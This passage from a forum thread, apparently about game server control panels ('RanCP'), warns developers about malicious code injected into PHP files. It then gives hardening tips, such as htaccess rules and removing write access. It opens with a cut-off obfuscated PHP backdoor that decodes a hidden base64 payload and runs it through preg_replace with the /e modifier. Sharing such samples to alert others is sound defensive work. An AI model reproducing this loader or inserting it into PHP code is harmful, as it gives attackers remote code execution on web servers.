tXdW5yUjRoZU5pUXkzdDRMbHJkWDNFakg0bDFkZC9aajlLajlFVzczWkVRQ01VWHJZMEREUEl0cml0RHFlSnhZK3MxQ2JpQjM0VitPOUNvL0x0c05XeEVaODhNak8rdFVJc1draXBqUUNLVWg4by9UNVJxbEVqckc3aDlnZTdKUksyUEROR0t0VkFvTml1R3p1ZG5XVTY5UlhNT1RpSTg3Qnd2ajFLNVk1RGN1cStwQ2RkQVdWbzYvNE5EbU9UR0szK2c5REhKbUEiKSkpOwcHJlZ19yZXBsYWNl';function IIl1llII($a, $b){$c=$GLOBALS['IlIl']; $d=pack('H*','6261'.'736536345f6465636f6465'); return $d(substr($c, $a, $b));};$I111II1lI = IIl1llII(3401, 16);$I111II1lI("/IllI111lI/e", IIl1llII(523, 2878), "IllI111lI");};

Now im Aware. Big thanks with this:tee:

 

[jayanna1421]

Re: Web security very critical must read!!

oh really? nothing critical? ok ignore it, i just want to alert some other guy who understand it. so they can remove it and keep their files safe..
and to those guys who doing this and trying to get my RanCP F**K U files go get it it will be useless to you swear 100% the code is obfuscated and you are just downloading my front end file no logic at all go get it.. if you want im going to share it to you privately or even here...
I know someone enter my public html file but I just ASSURE you you are downloading TRASH FILE..

to other fellow devs and mates check your php line. and put htaccess for those include folders. and deny write mode for all php file so they cannot inject code.

hehehe so can you share your ran cp hehehehe.....


but tnx to the alert^_^

 

[Ervs]

Up to this, Devs and newbies please be aware. Thanks TS for this precautionary measure you share i am much going to be careful and always study others ran cp shared here.

 

[Prot]

Up to this, Devs and newbies please be aware. Thanks TS for this precautionary measure you share i am much going to be careful and always study others ran cp shared here.

You just bumped an 1 year old post. Read the section rules before posting. Thread Closed.